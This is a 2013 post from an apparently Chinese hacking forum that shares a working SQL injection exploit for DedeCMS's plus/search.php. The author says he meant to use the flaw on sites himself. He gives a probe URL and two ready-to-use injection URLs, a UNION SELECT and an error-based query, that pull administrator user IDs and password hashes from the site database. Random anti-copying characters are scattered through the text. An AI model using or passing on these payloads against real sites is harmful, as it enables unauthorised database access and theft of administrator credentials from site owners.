找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1946|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
转载不加作者名的没JJ" Z& C" Z9 |4 G

8 Q* o4 j9 ~' L( |! C哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。5 [# U9 b. y( ]: C& p
! Y; u8 B3 K& B; Z9 L0 p
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
0 Z. B6 |/ I$ e; @. L) w  s5 E5 Y9 l4 R4 t9 v+ k1 v  [
我一般是这样测试的:, ]; l& _( ~& n7 a. x! J5 s

  q/ Y" _8 _3 {1 u提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a, l% g" O8 \( U/ D

- [  }2 M& [7 w& h- b5 X& g转载不加作者名的没JJ
. z, s0 ^9 O' A2 j' {- l7 }. E, L. J5 ]& u# ~
作者:鬼哥
+ Q8 `) k* l5 ~; W5 _# W
+ D+ G( k* D* K% P, A   q4 }4 ?: R9 B# t5 F
6 V* M* T/ ^0 N! L) |  M# i
看结果如果提示% F, _3 m' Q- f3 {6 F* |" P" Z3 J
# s$ ~- ?0 _8 i/ Y
Safe Alert: Request Error step 2 !/ ^6 q: K7 I: j5 Z

. R) P0 {' N6 y8 Q! U1 Z那么直接用下面的exp
$ k3 k; \$ L, \7 r# l" ~8 j
2 z$ k/ h( k$ O8 t4 B2 oxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a$ X" ~* Q; b3 h+ j5 g0 D- o2 c
4 \" b! X8 d+ H& W5 h
5 Q2 K# M1 [! a: j- A6 Z' M
看结果如果提示
2 k& p  a. g9 q9 M& n8 p
, b$ C$ P  o$ ]& nSafe Alert: Request Error step 1 !
/ k& z6 Y& k: Y; d
! g2 k3 N+ e- E+ Y; E$ H) O: L/ U那么直接用下面的exp2 Y5 g2 j0 F- t  d/ s# C0 `
+ v, f* U3 [4 o$ h2 q
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
* q& T7 l. S+ h" L9 ?; \) M1 Y
5 R' w. d! m  L, e. |4 L) M/ R2 w, J8 ]) T0 C( i4 _+ s/ y/ F( V( H! ^
如果正常显示证明漏洞不存在了。
7 I8 V4 ?0 T! ?  n1 E( q6 e
1 q  ~- @( c) s8 O  s9 H0 Q  x" I转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表